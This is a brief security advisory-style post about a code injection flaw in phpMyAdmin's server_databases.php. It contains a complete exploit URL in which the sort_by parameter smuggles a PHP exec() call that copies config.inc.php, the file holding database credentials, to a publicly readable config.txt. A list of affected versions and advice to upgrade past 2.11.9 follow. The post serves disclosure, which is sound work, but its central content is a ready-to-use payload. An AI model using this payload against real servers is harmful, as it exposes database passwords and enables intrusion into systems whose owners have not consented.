Phpmyadmin‘s server_databases.php bug
http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by=”])
OR exec(‘cp $(pwd)”/config.inc.php” config.txt’); //&sort_order=desc&token=[valid token]
some one may attact u by this method.
These phpmyadmin version will be influenced:
phpMyAdmin 2.11.9
phpMyAdmin 2.11.8
phpMyAdmin 2.11.7
phpMyAdmin 2.11.5 1
phpMyAdmin 2.11.5
phpMyAdmin 2.11.4
phpMyAdmin 2.11.1
phpMyAdmin 2.9.1
phpMyAdmin 2.9.2-rc1
phpMyAdmin 2.9.1.1
phpMyAdmin 2.11.8.1
phpMyAdmin 2.11.5.2
phpMyAdmin 2.11.2.2
phpMyAdmin 2.11.2.1
phpMyAdmin 2.11.1.2
phpMyAdmin 2.11.1.1
phpMyAdmin 2.10.0.2
phpMyAdmin 2.10.0.1
phpMyAdmin 2.10.0.1
So to deal with this you’d better update your phpmyadmin to
above 2.11.9.